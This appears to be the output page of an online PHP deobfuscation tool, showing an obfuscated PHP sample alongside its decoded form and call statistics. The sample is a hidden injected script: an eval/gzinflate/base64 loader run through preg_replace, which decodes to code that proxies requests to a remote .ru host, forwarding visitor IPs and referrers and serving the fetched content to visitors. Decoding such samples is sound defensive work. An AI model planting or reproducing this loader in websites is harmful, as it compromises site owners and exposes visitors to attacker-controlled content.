Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Cn5191 = "t4hj(szea2i7.rkc1bvfqmu69/ydwx0o38n*pg_)5l;";$NVOCPZa758 = $Cn5191[36].$C..

Decoded Output download

header('Content-Type: text/html; charset=UTF-8');
$p = 'p'; 
$host='sadasuduasdihaisdad.ru';
$path='/cache25112015-eoo/';
if (strpos($_SERVER['HTTP_HOST'], "www.") === false)
{
$_SERVER['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
}
else 
{
$_SERVER['HTTP_HOST'] = substr($_SERVER['HTTP_HOST'], 4);
}
$srvr=$_SERVER['HTTP_HOST'].'/eoo-';

function GetRealIp()
{
 if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
 {   $ip=$_SERVER['HTTP_CLIENT_IP'];}
 elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
 {  $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];}
 else
 {   $ip=$_SERVER['REMOTE_ADDR'];}
 return $ip;
} 

if(isset($_GET[$p])) 
{
$r = GetRealIp();
if (strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")!==FALSE) $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")+4);

$param=$_GET[$p];
if (strpos($param, '.js') !== false)
{
$ext='.js';
$param = str_replace('.js','',$param);
$srvr='';
}
else if(strpos($param, 'prokl-') !== false)
{
$ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6));
$param='prokl';
$srvr='';
}
else if(strpos($param, '.css') !== false)
{
$ext='.css';
$param = str_replace('.css','',$param);
$srvr='';
}
else if(strpos($param, '.gif') !== false)
{
$ext='.gif';
$param = str_replace('.gif','',$param);
$srvr='';
}
else if(strpos($param, '.htm') !== false)
{
$ext='.htm';
$param 
= str_replace('.htm','',$param);
$srvr='';
}
else if(strpos($param, '.jpg') !== false)
{
$ext='.jpg';
$param = str_replace('.jpg','',$param);
$srvr='';
}
else if(strpos($param, '.ico') !== false)
{
$ext='.ico';
$param = str_replace('.ico','',$param);
$srvr='';
}
else if(strpos($param, '.png') !== false)
{
$ext='.png';
$param = str_replace('.png','',$param);
$srvr='';
}
else{
$rf=$_SERVER['HTTP_REFERER'];
$ext='.php?ip='.$r.'&ref='.$ref;
}
$out ='';
$buff = '';
if ($curl = curl_init())
		{
		curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext);
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		$out = curl_exec($curl);
		curl_close($curl);
		}else{
		$fp = fsockopen($host, 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1
";
    $out .= "Host: ".$host."
";
	$out .= "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."
";
    $out .= "Connection: Close

";
    fwrite($fp, $out);
    while (!feof($fp)) {
        $buff.=fgets($fp, 128);
    }
	$result = explode("

", $buff, 2);
	$out= $result[1];
    fclose($fp);
} 
	}
	echo $out;
	exit
	;	
}

Did this file decode correctly?

Original Code

<?php $Cn5191 = "t4hj(szea2i7.rkc1bvfqmu69/ydwx0o38n*pg_)5l;";$NVOCPZa758 = $Cn5191[36].$Cn5191[13].$Cn5191[7].$Cn5191[37].$Cn5191[38].$Cn5191[13].$Cn5191[7].$Cn5191[36].$Cn5191[41].$Cn5191[8].$Cn5191[15].$Cn5191[7];$u3546 = "\x65".chr(118)."".chr(97)."l\x28\x67".chr(122)."\x69\x6e".chr(102)."\x6C".chr(97)."".chr(116)."".chr(101)."(\x62a".chr(115)."".chr(101)."".chr(54)."".chr(52)."\x5F".chr(100)."\x65\x63".chr(111)."\x64".chr(101)."\x28";$pUnuZ7941 = ")))\x3b";$H5280 = $u3546."'nVZtb6NGEP5sS/4PG2R1QcU4TntVZAtVVkJepDSJCG4r5SLE4SVwR2Bvd6lzivLfO7MYx6Um1/qLwTszzzPP7DKzKYuWTJj0pCwUK9Qo+MbZlCj2rMapespnJE4jIZlyF8HZ6Jhas0F/yIlLKKczAu9pKZVLZbSMZLWsIrnM0iiTy2jpiIpq50ilLh3HUZyyow+TydHh5MOIleUYrVlCTKkEL6U5DO88/3fPv6cXQXAbXtzcBfTBJsZqtXIMi7iuS5Iol8wa9F8Adpc3pLVzHYheB30GweTdYFl9gmS6MvnZqnGGUvwl3J1ODh2DshEqG/STqohVVhbknCmfRfklN+vcCao+YE9cfWtznVxdetdBeHlLHywLkiUvhJBhxt1uvxmkRFBbN+qf4dmN/8fcP/VO8Q2xa+gdyP/y3eDvzMb3frsJvHB+etq4CqYqUaAblotgJbLEzCScIcjr3Avuh7wWhzshoOxb9ek4EoZObQH/wvk5CDfwYFzeTolhHbju2fzqzrOIxmpv4a7I/4H+o950fYpF9ORu8m/lqa02oc5nSS1y0Dqq8C252jRrgDBRJULBeB7FzNRGm1K7tupvTB8ySreOLlSxzcdF+SUfdVLylP+qlnL0Fd4rkbMiLpfMbEq0BmlhGjUmSP/FsjYJuzUV/c+ZObHsLgXaumuB1n2K4TxmSScl2rop0boXJbTITkq0vVEO+m1StO9F+pk/dp8ysL1zzMC6F2UWl52UaOumROtelLzoVom2bkq0fo9S956k3fx878zzPV9PjK1vCDoedYbCoT8IluhXlqxnQVkpUgMPP1VJgoOxmWvDGL45WMBHmBWZMrHt9nov+KMXoSWWXNWONjlZ+Fc3t0EID9CfKsWn4zGQ4YR19Bh1tA6n1uVggijuXTDfCxb+deDPr+9Amk2UqNh3g7AV6k5ot+fpW5OEIaJh6grUItkzi2usLYo4LyXbXn1d1x9iE7xJJLKMv5ScFaaWapPjQ+BlQhRl/YTdtclPh81wgCiL4BjFYVSzG9CWidFVJMcgmPx44kw+io+FMduKdSD4AlinGK4rbTQ+vY3DQjIxmj/C9Ui7dZfkLfgfBHC3Kpi+C0zJCZYDvbY9k5XIFENlto6y1uurNMsZTPWElYnWvRGu8fHEOW7yyJSsYydHx03oKwoQTFY5Fog98xx7v7FhtutwmxxZjVa4PdUB95OHJrH17gH1epr3EJjFaakTxVD2nCl4zHrg8Dc='".$pUnuZ7941;$NVOCPZa758($Cn5191[25].$Cn5191[12].$Cn5191[35].$Cn5191[25].$Cn5191[7], $H5280  ,"614");

Function Calls

chr 14
gzinflate 2
preg_replace 1
base64_decode 2

Variables

$H5280 eval(gzinflate(base64_decode('nVZtb6NGEP5sS/4PG2R1QcU4TntVZA..
$u3546 eval(gzinflate(base64_decode(
$Cn5191 t4hj(szea2i7.rkc1bvfqmu69/ydwx0o38n*pg_)5l;
$pUnuZ7941 )));
$NVOCPZa758 preg_replace

Stats

MD5 7bb320137162957fe529c780f9410593
Eval Count 3
Decode Time 119 ms